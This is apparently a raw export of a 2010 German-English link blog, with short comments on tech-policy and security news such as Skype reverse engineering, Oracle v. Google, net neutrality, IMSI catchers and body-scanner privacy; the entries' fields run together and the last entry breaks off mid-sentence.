Handieshttp://arstechnica.com/tech-policy/news/2010/08/radio-riaa-mandatory-fm-radio-in-cell-phones-is-the-future.ars?utm_source=rss&utm_medium=rss&utm_campaign=rsspage_shots/2010/08/16/riaawillzwangsweiseukw-empfangerinhandies.pngriaawillzwangsweiseukw-empfangerinhandies141012010-08-16 20:30:256Skype: Programmierer knackt Skype-ProtokollDas Protokoll wurde reverse engineered, info leaked. Vortrag auf dem 27c3. Wo auch sonst? +In .de lauschen die Behörden mittlerweile mit [Udo Vetter/Lawblog](http://www.gulli.com/news/skype-in-deutschland-bereits-nicht-mehr-abh-rsicher-2010-08-17) + +Etwas älter (2007), aber dennoch freaky Geschichte dazu [Skype als Wanze](http://www.oreillynet.com/etel/blog/2007/04/skype_revenue_from_national_se_1.html). Damit läßt sich remote das Mic einschalten.<p>Das Protokoll wurde reverse engineered, info leaked. Vortrag auf dem 27c3. Wo auch sonst? + In .de lauschen die Behörden mittlerweile mit <a href="http://www.gulli.com/news/skype-in-deutschland-bereits-nicht-mehr-abh-rsicher-2010-08-17">Udo Vetter/Lawblog</a> +</p> +<p>Etwas älter (2007), aber dennoch freaky Geschichte dazu <a href="http://www.oreillynet.com/etel/blog/2007/04/skype_revenue_from_national_se_1.html">Skype als Wanze</a>. Damit läßt sich remote das Mic einschalten. +</p>http://www.golem.de/1007/76365.htmlpage_shots/2010/08/20/skypeprogrammiererknacktskype-protokoll-gole.pngskypeprogrammiererknacktskype-protokoll-gole11012010-08-15 22:40:516skypeOracle sues GoogleTja, warum haben sie auch Java für ihr Phone genommen? + +Die Java die! .de Java User Groups wollen ganz weg von Kommerzkontrolle [heise](http://www.heise.de/newsticker/meldung/Deutsche-Java-Anwender-aergern-sich-ueber-Oracle-1061565.html)<p>Tja, warum haben sie auch Java für ihr Phone genommen? +</p> +<p>Die Java die! .de Java User Groups wollen ganz weg von Kommerzkontrolle <a href="http://www.heise.de/newsticker/meldung/Deutsche-Java-Anwender-aergern-sich-ueber-Oracle-1061565.html">heise</a> +</p>http://tirania.org/blog/archive/2010/Aug-13.htmlpage_shots/2010/08/19/oraclesuesgoogle_.pngoraclesuesgoogle11012010-08-13 23:24:506google java oracle patentRIP Open SolarisDas war es für Open Solaris. Mal gucken wann OpenOffice, VirtualBox und das andere OpenZeugs aus dem Sun-Nachlass verschrottet wird.<p>Das war es für Open Solaris. Mal gucken wann OpenOffice, VirtualBox und das andere OpenZeugs aus dem Sun-Nachlass verschrottet wird. +</p>http://blogs.everycity.co.uk/alasdair/2010/08/opensolaris-is-now-officially-dead-rip/page_shots/2010/08/13/ripopensolaris.pngripopensolaris11012010-08-13 23:11:496oracle solarisA Review of Verizon and Google&#039;s Net Neutrality Proposal | Electronic Frontier Foundationhttps://www.eff.org/deeplinks/2010/08/google-verizon-netneutralitypage_shots/2010/08/13/areviewofverizonandgoogle039snetneutrali.pngareviewofverizonandgoogle039snetneutrali141012010-08-13 15:13:326heise online - Britische Regierung: Internet Explorer 6 ist sicher genughttp://www.heise.de/newsticker/meldung/Britische-Regierung-Internet-Explorer-6-ist-sicher-genug-1051804.htmlpage_shots/2010/08/13/heiseonline-britischeregierunginternetexplo.pngheiseonline-britischeregierunginternetexplo141012010-08-13 15:12:336Schon wieder: Remote Code Execution Vulnerabilities in Adobe Flashhttp://www.heise.de/newsticker/meldung/Adobe-schliesst-kritische-Luecken-in-Flash-und-Co-1053688.htmlpage_shots/2010/08/13/schonwiederremotecodeexecutionvulnerabilitie.pngschonwiederremotecodeexecutionvulnerabilitie141012010-08-13 15:11:406 Piraten-Vorstand verschiebt Liquid-Democracy-Start : netzpolitik.orgPiratenpartei schießt sich ein Eigentor mit Liquid Feedback Einführungsaufschub.<p>Piratenpartei schießt sich ein Eigentor mit Liquid Feedback Einführungsaufschub. +</p>http://www.netzpolitik.org/2010/piraten-vorstand-gegen-liquid-democracy/page_shots/2010/08/06/piraten-vorstandverschiebtliquid-democracy-sta.pngpiraten-vorstandverschiebtliquid-democracy-sta11012010-08-06 22:23:566piratenparteiFirefox 4 beta crack ruse spreads Trojan to total idiots • The RegisterYou notice that the Browser War is won if the scammers are offering Firefox 4 beta w/ keyloggers.<p>You notice that the Browser War is won if the scammers are offering Firefox 4 beta w/ keyloggers. +</p>http://www.theregister.co.uk/2010/08/06/firefox_crack_scam/page_shots/2010/08/06/firefox4betacrackrusespreadstrojantototal.pngfirefox4betacrackrusespreadstrojantototal11012010-08-06 22:18:426browser firefox scamCourt Rejects Warrantless GPS Tracking | Electronic Frontier FoundationWashington, D.C. - The U.S. Court of Appeals for the District of Columbia Circuit today firmly rejected government claims that federal agents have an unfettered right to install Global Positioning System (GPS) location-tracking devices on anyone's car without a search warrant.<p>Washington, D.C. - The U.S. Court of Appeals for the District of Columbia Circuit today firmly rejected government claims that federal agents have an unfettered right to install Global Positioning System (GPS) location-tracking devices on anyone's car without a search warrant. +</p>http://www.eff.org/press/archives/2010/08/06-0page_shots/2010/08/06/courtrejectswarrantlessgpstrackingelectroni.pngcourtrejectswarrantlessgpstrackingelectroni11012010-08-06 22:14:486eff gps trackingeBay photocopier data risk ignored • The RegisterPhoto copy machine bought at eBay. Found sensitive documents from defence supplier Cobham. + +With the assistance of experts, the paper was able to recover documents and faxes including an April purchase order from aerospace giant BAE Systems and NATO briefing notes. It also found a direct debit instruction that gave away the details of one of the firm's bank accounts, along with an authorised signature and the personal details of one worker from a vetting request. + +Vielleicht hat der WL-Informant nur einen alten Kopierer gekauft?<p>Photo copy machine bought at eBay. Found sensitive documents from defence supplier Cobham. +</p> +<p>With the assistance of experts, the paper was able to recover documents and faxes including an April purchase order from aerospace giant BAE Systems and NATO briefing notes. It also found a direct debit instruction that gave away the details of one of the firm's bank accounts, along with an authorised signature and the personal details of one worker from a vetting request. +</p> +<p>Vielleicht hat der WL-Informant nur einen alten Kopierer gekauft? +</p>http://www.theregister.co.uk/2010/08/06/ebay_photocopier_disposal_risk/page_shots/2010/08/06/ebayphotocopierdatariskignoredtheregister.pngebayphotocopierdatariskignoredtheregister11012010-08-06 22:12:456datalossPrivate browsing modes in four biggest browsers often fail • The RegisterIncognito browsing to *not* leave local traces seems not to be that incognito. Examples provided in the article.<p>Incognito browsing to <em>not</em> leave local traces seems not to be that incognito. Examples provided in the article. +</p>http://www.theregister.co.uk/2010/08/06/private_browsing_mode_failure/page_shots/2010/08/06/privatebrowsingmodesinfourbiggestbrowsersof.pngprivatebrowsingmodesinfourbiggestbrowsersof11012010-08-06 22:09:406browser privacySächsische Zeitung [online] - Politik: Nazi-Angriff auf Buchenwald kam aus PirnaAm 28.Juli wurden die Internetseiten der Stiftung Gedenkstätten Buchenwald und Mittelbau Dora gehackt. „Inhalte wurden gelöscht und neue Texte eingespielt“, berichtet Hannes Grünseisen, Staatsanwalt in Erfurt. + +Nun steht fest: Der Angriff kam aus Pirna. „Wir haben Telefondaten ausgewertet, welche die Telekom aus Abrechnungszwecken gespeichert hat“, erzählt Hannes Grünseisen. Die Täter hatten zuvor versucht, falsche Fährten zu legen. So wurden offenbar andere Internetadressen dazu genutzt, um die eigenen Spuren zu verwischen. Es schien zunächst, als käme der Anschlag aus Amerika.<p>Am 28.Juli wurden die Internetseiten der Stiftung Gedenkstätten Buchenwald und Mittelbau Dora gehackt. „Inhalte wurden gelöscht und neue Texte eingespielt“, berichtet Hannes Grünseisen, Staatsanwalt in Erfurt. +</p> +<p>Nun steht fest: Der Angriff kam aus Pirna. „Wir haben Telefondaten ausgewertet, welche die Telekom aus Abrechnungszwecken gespeichert hat“, erzählt Hannes Grünseisen. Die Täter hatten zuvor versucht, falsche Fährten zu legen. So wurden offenbar andere Internetadressen dazu genutzt, um die eigenen Spuren zu verwischen. Es schien zunächst, als käme der Anschlag aus Amerika. +</p>http://www.sz-online.de/nachrichten/artikel.asp?id=2529098page_shots/2010/08/06/sachsischezeitungonline-politiknazi-angrif.pngsachsischezeitungonline-politiknazi-angrif11012010-08-06 22:06:326defacement nazisApparatus for Facilitating the Birth of a Child by Centrifugal ForceThe patent holders, George B. and Charlotte Blonsky, contend that the centrifuge could be a boon to "more civilized women," who, they surmise, often lack the muscle strength needed to easily push out a baby. Centrifugal force would act as a sort of invisible midwife, lessening the muscular force required for birthing. Would it work, though? Could one create enough outward force on the baby to make a difference -- without simultaneously making the mother lightheaded? I sent the patent to April Ronca, who used to research the effects of zero G on fetal growth and birth for NASA. "That is an interesting invention," she replied.<p>The patent holders, George B. and Charlotte Blonsky, contend that the centrifuge could be a boon to "more civilized women," who, they surmise, often lack the muscle strength needed to easily push out a baby. Centrifugal force would act as a sort of invisible midwife, lessening the muscular force required for birthing. Would it work, though? Could one create enough outward force on the baby to make a difference -- without simultaneously making the mother lightheaded? I sent the patent to April Ronca, who used to research the effects of zero G on fetal growth and birth for NASA. "That is an interesting invention," she replied. +</p>http://patimg1.uspto.gov/.piw?Docid=03216423&homeurl=http%3A%2F%2Fpatft.uspto.gov%2Fnetacgi%2Fnph-Parser%3FSect1%3DPTO1%2526Sect2%3DHITOFF%2526d%3DPALL%2526p%3D1%2526u%3D%25252Fnetahtml%25252FPTO%25252Fsrchnum.htm%2526r%3D1%2526f%page_shots/2010/08/06/apparatusforfacilitatingthebirthofachildby.pngapparatusforfacilitatingthebirthofachildby131012010-08-06 21:39:586Kindle Stories from Real Users &laquo; Me and My KindleCoole Kindle-Werbung: Das Ding umgeht in China die Great Firewall.<p>Coole Kindle-Werbung: Das Ding umgeht in China die Great Firewall. +</p>http://meandmykindle.wordpress.com/2010/07/27/kindle-stories-from-real-users/page_shots/2010/08/06/kindlestoriesfromrealuserslaquomeandmyk.pngkindlestoriesfromrealuserslaquomeandmyk11012010-08-06 09:50:526amazon china kindleBusyBox takes out bankrupt opponent in GPL lawsuit The ruling isn't a sweeping victory for the GPL, but it does show that the GPL is compatible with the standards for summary judgement.<p> The ruling isn't a sweeping victory for the GPL, but it does show that the GPL is compatible with the standards for summary judgement. +</p>http://arstechnica.com/open-source/news/2010/08/court-rules-gpl-part-of-a-well-pleaded-case.arspage_shots/2010/08/05/busyboxtakesoutbankruptopponentingpllawsuit.pngbusyboxtakesoutbankruptopponentingpllawsuit11012010-08-05 22:59:496gpl licenseSurprise! Feds stored thousands of checkpoint body scan images after allNow it turns out that some police agencies are storing the controversial images after all. The U.S. Marshals Service admitted this week that it had surreptitiously saved tens of thousands of images recorded with a millimeter wave system at the security checkpoint of a single Florida courthouse.<p>Now it turns out that some police agencies are storing the controversial images after all. The U.S. Marshals Service admitted this week that it had surreptitiously saved tens of thousands of images recorded with a millimeter wave system at the security checkpoint of a single Florida courthouse. +</p>http://news.cnet.com/8301-31921_3-20012583-281.htmlpage_shots/2010/08/05/surprisefedsstoredthousandsofcheckpointbody.pngsurprisefedsstoredthousandsofcheckpointbody131012010-08-05 17:02:326nacktscanner privacy security theaterUK government: Upgrading away from IE6 costs too muchm( Die Kosten rechnen sich nicht IE6 abzulösen. + +The UK government is not yet interested in ditching Internet Explorer 6, saying the costs required to do so outweigh the benefits. Six months ago, an online petition started in hopes that the UK would abolish all use of the world's most-loathed browser. + +The petition debuted soon after the German and French governments began to advise their citizens to use a different browser than IE in the wake of the Chinese-Google hack attack. It closed on June 6 after gathering 6,223 signatures; on July 30, the government gave an official response. Here's the crux of it: + +Complex software will always have vulnerabilities and motivated adversaries will always work to discover and take advantage of them. There is no evidence that upgrading away from the latest fully patched versions of Internet Explorer to other browsers will make users more secure. Regular software patching and updating will help defend against the latest threats. The Government continues to work with Microsoft and other internet browser suppliers to understand the security of the products used by HMG, including Internet Explorer and we welcome the work that Microsoft are continuing do on delivering security solutions which are deployed as quickly as possible to all Internet Explorer users. +The UK government is correct in saying that Microsoft will <p>m( Die Kosten rechnen sich nicht IE6 abzulösen. +</p> +<p>The UK government is not yet interested in ditching Internet Explorer 6, saying the costs required to do so outweigh the benefits. Six months ago, an online petition started in hopes that the UK would abolish all use of the world's most-loathed browser. +</p> +<p>The petition debuted soon after the German and French governments began to advise their citizens to use a different browser than IE in the wake of the Chinese-Google hack attack. It closed on June 6 after gathering 6,223 signatures; on July 30, the government gave an official response. Here's the crux of it: +</p> +<p>Complex software will always have vulnerabilities and motivated adversaries will always work to discover and take advantage of them. There is no evidence that upgrading away from the latest fully patched versions of Internet Explorer to other browsers will make users more secure. Regular software patching and updating will help defend against the latest threats. The Government continues to work with Microsoft and other internet browser suppliers to understand the security of the products used by HMG, including Internet Explorer and we welcome the work that Microsoft are continuing do on delivering security solutions which are deployed as quickly as possible to all Internet Explorer users. + The UK government is correct in saying that Microsoft will +</p>http://arstechnica.com/microsoft/news/2010/08/despite-petition-uk-government-to-keep-ie6.arspage_shots/2010/08/05/ukgovernmentupgradingawayfromie6coststoom.pngukgovernmentupgradingawayfromie6coststoom11012010-08-05 09:48:026goverment ie6 microsoft ukGoogle and Verizon in Talks on Selling Internet Priority - NYTimes.comNetneutrality my ass - Don't be evil. + +Google and Verizon, two leading players in Internet service and content, are nearing an agreement that could allow Verizon to speed some online content to Internet users more quickly if the content’s creators are willing to pay for the privilege.<p>Netneutrality my ass - Don't be evil. +</p> +<p>Google and Verizon, two leading players in Internet service and content, are nearing an agreement that could allow Verizon to speed some online content to Internet users more quickly if the content’s creators are willing to pay for the privilege. +</p>http://www.nytimes.com/2010/08/05/technology/05secret.html?_r=4page_shots/2010/08/05/googleandverizonintalksonsellinginternetpr.pnggoogleandverizonintalksonsellinginternetpr11012010-08-05 09:44:226google netneutralityheise online - US-Bürgerrechtler sammeln weiter Argumente gegen NacktscannerNachdem im April die Sicherheitsbehörde Transportation Security Administration (TSA) eingeräumt hatte, entgegen früherer Beteuerungen rund 2000 von Nacktscannern gefertigte Bilder gespeichert zu haben, hat auch der U.S. Marshals Service (USMS) die mit einem Scanner angefertigten Aufnahmen nicht gelöscht. + +Das EPIC hat vom US-amerikanischen Justizministerium, dem die Justizvollzugsbeamten des USMS angehören, die schriftliche Auskunft (PDF-Datei) erhalten, dass auf einem Gerät des Typs Brijot Gen2 gut 35.000 Bilder abgespeichert wurden. Der Scanner sei in einem Gerichtsgebäude in Orlando im US-Bundesstaat Florida eingesetzt worden. <p>Nachdem im April die Sicherheitsbehörde Transportation Security Administration (TSA) eingeräumt hatte, entgegen früherer Beteuerungen rund 2000 von Nacktscannern gefertigte Bilder gespeichert zu haben, hat auch der U.S. Marshals Service (USMS) die mit einem Scanner angefertigten Aufnahmen nicht gelöscht. +</p> +<p>Das EPIC hat vom US-amerikanischen Justizministerium, dem die Justizvollzugsbeamten des USMS angehören, die schriftliche Auskunft (PDF-Datei) erhalten, dass auf einem Gerät des Typs Brijot Gen2 gut 35.000 Bilder abgespeichert wurden. Der Scanner sei in einem Gerichtsgebäude in Orlando im US-Bundesstaat Florida eingesetzt worden. +</p>http://www.heise.de/newsticker/meldung/US-Buergerrechtler-sammeln-weiter-Argumente-gegen-Nacktscanner-1050665.htmlpage_shots/2010/08/04/heiseonline-us-burgerrechtlersammelnweiterar.pngheiseonline-us-burgerrechtlersammelnweiterar11012010-08-04 15:01:546epic nacktscanner tsaCollateral Murder-Video: Erstaunliche Wendung in Sachen Wikileaks - Medien - Feuilleton - FAZ.NETPrivate Schnüffelorganisation analysiert das Internet seit 14 Jahren! Darüber soll Manning ermittelt worden sein. + +Mit diesem Bekenntnis erfährt die Geschichte um Wikileaks eine neue Wendung. Stimmen die Angaben von Chet Uber, ist Bradley Manning nicht mehr der allzu naive Soldat, der sich einem überraschten Dritten anvertraute. Stimmen die Angaben, werden amerikanische Bürger in größerem Stil überwacht als bisher angenommen, mit steigender Tendenz: „Project Vigilant“ will die Zahl seiner Freiwilligen auf 1600 aufstocken, so erklärte es Chet Uber auf der Defcon-Konferenz, wo er um Freiwillige warb. Der Ablauf der Ereignisse ist noch nicht vollständig geklärt und erklärt.<p>Private Schnüffelorganisation analysiert das Internet seit 14 Jahren! Darüber soll Manning ermittelt worden sein. +</p> +<p>Mit diesem Bekenntnis erfährt die Geschichte um Wikileaks eine neue Wendung. Stimmen die Angaben von Chet Uber, ist Bradley Manning nicht mehr der allzu naive Soldat, der sich einem überraschten Dritten anvertraute. Stimmen die Angaben, werden amerikanische Bürger in größerem Stil überwacht als bisher angenommen, mit steigender Tendenz: „Project Vigilant“ will die Zahl seiner Freiwilligen auf 1600 aufstocken, so erklärte es Chet Uber auf der Defcon-Konferenz, wo er um Freiwillige warb. Der Ablauf der Ereignisse ist noch nicht vollständig geklärt und erklärt. +</p>http://www.faz.net/s/Rub475F682E3FC24868A8A5276D4FB916D7/Doc~EB7743084C84B417480B1175808764D35~ATpl~Ecommon~Scontent.htmlpage_shots/2010/08/03/132collateralmurder147-videoerstaunliche_.png132collateralmurder147-videoerstaunliche11012010-08-03 18:13:236observation privacy viligant + + +Bing Adds Open Street Map + + +Openstreetmap-Data in Bing. Weiß nicht, ob das so wichtig ist, aber ich finde es cool für das OSM-Projekt.<p>Openstreetmap-Data in Bing. Weiß nicht, ob das so wichtig ist, aber ich finde es cool für das OSM-Projekt. +</p>http://www.readwriteweb.com/archives/bing_adds_open_street_map.phppage_shots/2010/08/03/no_page_shot_.pngbingaddsopenstreetmap11012010-08-03 17:47:406bing openstreetmapRIAA, FBI issuing takedown requests for Radiohead's "In Rainbows"TorrentFreak reports that the RIAA and FBI are sending takedown notices to people sharing Radiohead's "self-released" album "In Rainbows," which was released in MP3 form at the time for whatever fans wanted to pay (though there were some oddly conflicting messages later from the band's management).<p>TorrentFreak reports that the RIAA and FBI are sending takedown notices to people sharing Radiohead's "self-released" album "In Rainbows," which was released in MP3 form at the time for whatever fans wanted to pay (though there were some oddly conflicting messages later from the band's management). +</p>http://torrentfreak.com/riaa-protects-radioheads-in-rainbows-100801/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A%20Torrentfreak%20%28Torrentfreak%29page_shots/2010/08/03/riaafbiissuingtakedownrequestsforradiohead.pngriaafbiissuingtakedownrequestsforradiohead131012010-08-03 17:13:496contentmafia, copyfight, file sharing, riaaMicrosoft quashed IE privacy controls for the ad industryMicrosoft gutted a new privacy control system from Internet Explorer 8 at the behest of the advertising industry and its own marketing executives. <p>Microsoft gutted a new privacy control system from Internet Explorer 8 at the behest of the advertising industry and its own marketing executives. +</p>http://www.wired.com/epicenter/2010/08/ie8-waterdown-privacy/page_shots/2010/08/03/microsoftquashedieprivacycontrolsfortheadi.pngmicrosoftquashedieprivacycontrolsfortheadi131012010-08-03 17:11:516microsoft online privacy FBI will Wikipedia Nutzung seines Logos untersagen : netzpolitik.orgFBI mag nicht, dass ihr Logo in der Wikipedia steht.<p>FBI mag nicht, dass ihr Logo in der Wikipedia steht. +</p>http://www.netzpolitik.org/2010/fbi-will-wikipedia-nutzung-seines-logos-untersagen/page_shots/2010/08/03/fbiwillwikipedianutzungseineslogosuntersag.pngfbiwillwikipedianutzungseineslogosuntersag11012010-08-03 15:43:176fbi wikipediaHomebrew-Tool gegen kritische iPhone-PDF-LückeWährend die Homebrew-Szene bereits ein Tool für gejailbreakte iPhones entwickelt hat, müssen Anwender unmodifizierter Apple-Geräte noch auf einen offziellen Patch warten.<p>Während die Homebrew-Szene bereits ein Tool für gejailbreakte iPhones entwickelt hat, müssen Anwender unmodifizierter Apple-Geräte noch auf einen offziellen Patch warten. +</p>http://www.heise.de/newsticker/meldung/Homebrew-Tool-gegen-kritische-iPhone-PDF-Luecke-1049564.htmlpage_shots/2010/08/03/homebrew-toolgegenkritischeiphone-pdf-lucke.pnghomebrew-toolgegenkritischeiphone-pdf-lucke131012010-08-03 13:36:236apple diyBotnet with 60GB of stolen data cracked wide open • The RegisterSize matters: Botnet mit 60 GB Daten geknackt.<p>Size matters: Botnet mit 60 GB Daten geknackt. +</p>http://www.theregister.co.uk/2010/08/02/mumba_botnet_infiltrated/page_shots/2010/08/03/botnetwith60gbofstolendatacrackedwideopen.pngbotnetwith60gbofstolendatacrackedwideopen11012010-08-03 10:49:566botnetPanne in Tschechien: Namen Tausender Agenten im Internet veröffentlicht - SPIEGEL ONLINE - Nachrichten - PolitikTschechien wird zur ernsthaften Konkurenz zu WL<p>Tschechien wird zur ernsthaften Konkurenz zu WL +</p>http://www.spiegel.de/politik/ausland/0,1518,709806,00.htmlpage_shots/2010/08/02/panneintschechiennamentausenderagentenimin.pngpanneintschechiennamentausenderagentenimin11012010-08-02 22:28:036wikileaks Londoner Polizei wurde beim fälschen von CCTV-Videos erwischt : netzpolitik.orgWenn die Bilder nicht gut genug sind: Police London fälscht cctv videos. Evtl. sollten wir echt den Photoshop des Monats einführen.<p>Wenn die Bilder nicht gut genug sind: Police London fälscht cctv videos. Evtl. sollten wir echt den Photoshop des Monats einführen. +</p>http://www.netzpolitik.org/2010/londoner-polizei-wurde-beim-falschen-von-cctv-videos-erwischt/page_shots/2010/08/02/londonerpolizeiwurdebeimfalschenvoncctv-vi.pnglondonerpolizeiwurdebeimfalschenvoncctv-vi11012010-08-02 22:18:496cctv photoshopBlackBerry encryption too secure National security vs. consumer privacyWeil die Inder Blackberries nicht knacken können, werden Dienste davon verboten... +The Indian government’s internal security and intelligence services cannot break the encryption of the device, which makes countering terror threats and national security matters difficult - especially for a region which faces constant threats and attacks from domestic Maoist insurgents and extremist Islamic groups. + +The BBC confirmed via the UAE’s state media that come October, all half a million BlackBerry users in the region will have some services suspended unless a “solution compatible with local laws is reached”, amid national security concerns. + +Sie haben auch schon [Google und Skype](http://www.itworld.com/security/117278/india-may-put-restrictions-skype-and-google) im Visier. + +Noch mehr links [Computerworld](http://www.computerworld.com/s/article/9180563/Indian_government_to_meet_operators_over_the_BlackBerry?taxonomyId=145), <p>Weil die Inder Blackberries nicht knacken können, werden Dienste davon verboten... + The Indian government’s internal security and intelligence services cannot break the encryption of the device, which makes countering terror threats and national security matters difficult - especially for a region which faces constant threats and attacks from domestic Maoist insurgents and extremist Islamic groups. +</p> +<p>The BBC confirmed via the UAE’s state media that come October, all half a million BlackBerry users in the region will have some services suspended unless a “solution compatible with local laws is reached”, amid national security concerns. +</p> +<p>Sie haben auch schon <a href="http://www.itworld.com/security/117278/india-may-put-restrictions-skype-and-google">Google und Skype</a> im Visier. +</p> +<p>Noch mehr links <a href="http://www.computerworld.com/s/article/9180563/Indian_government_to_meet_operators_over_the_BlackBerry?taxonomyId=145">Computerworld</a>, +</p>http://www.zdnet.com/blog/igeneration/blackberry-encryption-too-secure-national-security-vs-consumer-privacy/5732?page_shots/2010/08/17/blackberryencryption039toosecure039nati.pngblackberryencryption039toosecure039nati11012010-08-01 23:15:006blackberry india rimMan faces jail for videotaping gun-waving copPolice officer Joseph Uhler was caught on film charging out of his unmarked car and waving his gun at a unarmed motorcyclist pulled over for speeding. When the footage was uploaded to YouTube, authorities raided Anthony Graber's home, siezed his computers, arrested him, and charged him with "wiretapping" offenses that could land him in jail for 16 years. Indeed, Maryland contends that Uhler had a reasonable expectation of privacy while waving his gun around in public and yelling at a motorist with a giant video camera mounted on the top of his helmet.<p>Police officer Joseph Uhler was caught on film charging out of his unmarked car and waving his gun at a unarmed motorcyclist pulled over for speeding. When the footage was uploaded to YouTube, authorities raided Anthony Graber's home, siezed his computers, arrested him, and charged him with "wiretapping" offenses that could land him in jail for 16 years. Indeed, Maryland contends that Uhler had a reasonable expectation of privacy while waving his gun around in public and yelling at a motorist with a giant video camera mounted on the top of his helmet. +</p>http://www.mclu.org/node/653page_shots/2010/08/01/manfacesjailforvideotapinggun-wavingcop.pngmanfacesjailforvideotapinggun-wavingcop131012010-08-01 19:21:136police public surveillance videoheise online - CCC: Wir kommen in FriedenCongress CfP started. Motto: "We come in peace"<p>Congress CfP started. Motto: "We come in peace" +</p>http://www.heise.de/newsticker/meldung/CCC-Wir-kommen-in-Frieden-1048810.htmlpage_shots/2010/08/01/heiseonline-cccwirkommeninfrieden.pngheiseonline-cccwirkommeninfrieden11012010-08-01 18:35:436cccheise online - Apple beantragt Patente für Reise- und Mode-AppsWebportale zum Buchen von Hotels und Reisen gibt es nicht erst sei gestern. Und auch dedizierte Anwendungen aus diesem Bereich für das iPhone oder andere Smartphones sind keine Mangelware. Trotzdem beantragte Apple im Oktober vergangenen Jahres in den USA drei Patente, die solche Anwendungen schützen sollen.<p>Webportale zum Buchen von Hotels und Reisen gibt es nicht erst sei gestern. Und auch dedizierte Anwendungen aus diesem Bereich für das iPhone oder andere Smartphones sind keine Mangelware. Trotzdem beantragte Apple im Oktober vergangenen Jahres in den USA drei Patente, die solche Anwendungen schützen sollen. +</p>http://www.heise.de/newsticker/meldung/Apple-beantragt-Patente-fuer-Reise-und-Mode-Apps-1048876.htmlpage_shots/2010/08/01/heiseonline-applebeantragtpatentefurreise.pngheiseonline-applebeantragtpatentefurreise11012010-08-01 18:34:116apple travelheise online - IMSI-Catcher für 1500 Euro im EigenbauChris Paget erstmals seinen selbst gebauten IMSI-Catcher zum Belauschen von GSM-Netzen öffentlich auf ein Mobilfunknetz losgelassen. Der britischen Hackers ließ seine Konstruktion, bestehend aus einer programmierbaren Funkhardware (USRP, Universal Software Radio Peripheral) und der Open-Source-Software OpenBTS, das Netz von AT&T nachahmen. Nach wenigen Minuten waren bereits über 30 Mobiltelefone mit seiner Basisstation verbunden. + +GSM ist wohl damit genau so kaputt wie WEP. Security by Obscurity #fail. + +Diese Nachricht ist nur ein Baustein dazu. Müssen mal die anderen noch etwas zusammen sammeln und das gemeinsam würdigen.<p>Chris Paget erstmals seinen selbst gebauten IMSI-Catcher zum Belauschen von GSM-Netzen öffentlich auf ein Mobilfunknetz losgelassen. Der britischen Hackers ließ seine Konstruktion, bestehend aus einer programmierbaren Funkhardware (USRP, Universal Software Radio Peripheral) und der Open-Source-Software OpenBTS, das Netz von AT&amp;T nachahmen. Nach wenigen Minuten waren bereits über 30 Mobiltelefone mit seiner Basisstation verbunden. +</p> +<p>GSM ist wohl damit genau so kaputt wie WEP. Security by Obscurity #fail. +</p> +<p>Diese Nachricht ist nur ein Baustein dazu. Müssen mal die anderen noch etwas zusammen sammeln und das gemeinsam würdigen. +</p>http://www.heise.de/newsticker/meldung/IMSI-Catcher-fuer-1500-Euro-im-Eigenbau-1048919.htmlpage_shots/2010/08/01/heiseonline-imsi-catcherfur1500euroimeigen.pngheiseonline-imsi-catcherfur1500euroimeigen11012010-08-01 18:31:126gsm imsiheise online - US-Behörden verhören Wikileaks-AktivistenDer Friedensnobelpreisträger läßt Jacob Applebaum fest nehmen. Verkehrte Welt.<p>Der Friedensnobelpreisträger läßt Jacob Applebaum fest nehmen. Verkehrte Welt. +</p>http://www.heise.de/newsticker/meldung/US-Behoerden-verhoeren-Wikileaks-Aktivisten-1048925.htmlpage_shots/2010/08/01/heiseonline-us-behordenverhorenwikileaks-akti.pngheiseonline-us-behordenverhorenwikileaks-akti11012010-08-01 18:28:256wikileaksheise online - WPA2-Lücke: ARP-Spoofing im WLANARP spoofing jetzt neu fürs WLAN (WPA2 Enterprise)<p>ARP spoofing jetzt neu fürs WLAN (WPA2 Enterprise) +</p>http://www.heise.de/newsticker/meldung/WPA2-Luecke-ARP-Spoofing-im-WLAN-1048568.htmlpage_shots/2010/07/30/heiseonline-wpa2-luckearp-spoofingimwlan.pngheiseonline-wpa2-luckearp-spoofingimwlan11012010-07-30 16:28:396hack wlan wpaResearcher demonstrates ATM &quot;jackpotting&quot; at Black Hat ConferenceIn one of the attacks, Jack reprogrammed the ATM remotely over a network, without touching the machine; the second attack required he open the front panel and plug in a USB stick loaded with malware.<p>In one of the attacks, Jack reprogrammed the ATM remotely over a network, without touching the machine; the second attack required he open the front panel and plug in a USB stick loaded with malware. +</p>http://arstechnica.com/security/news/2010/07/researcher-demonstrates-atm-jackpotting-at-black-hat-conference.arspage_shots/2010/07/30/researcherdemonstratesatmquotjackpottingquot.pngresearcherdemonstratesatmquotjackpottingquot11012010-07-30 00:34:036atm100 million Facebook users' details published online - Technology & science - Security - msnbc.comThe personal details of 100 million Facebook users have been collected and published online in a downloadable file, meaning they will now be unable to make their publicly available information private. +However, Facebook downplayed the issue, saying that no private data had been compromised.<p>The personal details of 100 million Facebook users have been collected and published online in a downloadable file, meaning they will now be unable to make their publicly available information private. + However, Facebook downplayed the issue, saying that no private data had been compromised. +</p>http://www.msnbc.msn.com/id/38463013/ns/technology_and_science/page_shots/2010/07/30/100millionfacebookusersdetailspublishedonli.png100millionfacebookusersdetailspublishedonli11012010-07-30 00:32:126facebookGoogle nabs patent to monitor your cursor movements - Search giant ogles cursor monitoring for refined search results | TechEyeGoogle has been awarded a patent for displaying search results based on how you move your mouse cursor on the screen. + +While it sounds initially bizarre, Google's plans are to monitor the movements of the cursor, such as when a user hovers over a certain ad or link to read a tooltip, and then provide relevant search results, and ads, based on that behaviour. It means that it does not require users to actually click a link to know that they were interested in it, opening a world of opportunity for even more focused ads, which are Google's main source of income. + +Read more: http://www.techeye.net/internet/google-nabs-patent-to-monitor-your-cursor-movements#ixzz0v0kbkx3V<p>Google has been awarded a patent for displaying search results based on how you move your mouse cursor on the screen. +</p> +<p>While it sounds initially bizarre, Google's plans are to monitor the movements of the cursor, such as when a user hovers over a certain ad or link to read a tooltip, and then provide relevant search results, and ads, based on that behaviour. It means that it does not require users to actually click a link to know that they were interested in it, opening a world of opportunity for even more focused ads, which are Google's main source of income. +</p> +<p>Read more: http://www.techeye.net/internet/google-nabs-patent-to-monitor-your-cursor-movements#ixzz0v0kbkx3V +</p>http://www.techeye.net/internet/google-nabs-patent-to-monitor-your-cursor-movementspage_shots/2010/07/28/googlenabspatenttomonitoryourcursormovement.pnggooglenabspatenttomonitoryourcursormovement11012010-07-28 22:31:426google mouse patentGoogle AlarmGoogle Alarm shows notifications, plays sound effects and keeps running stats about the % of websites you’ve visit with Google bugs present.<p>Google Alarm shows 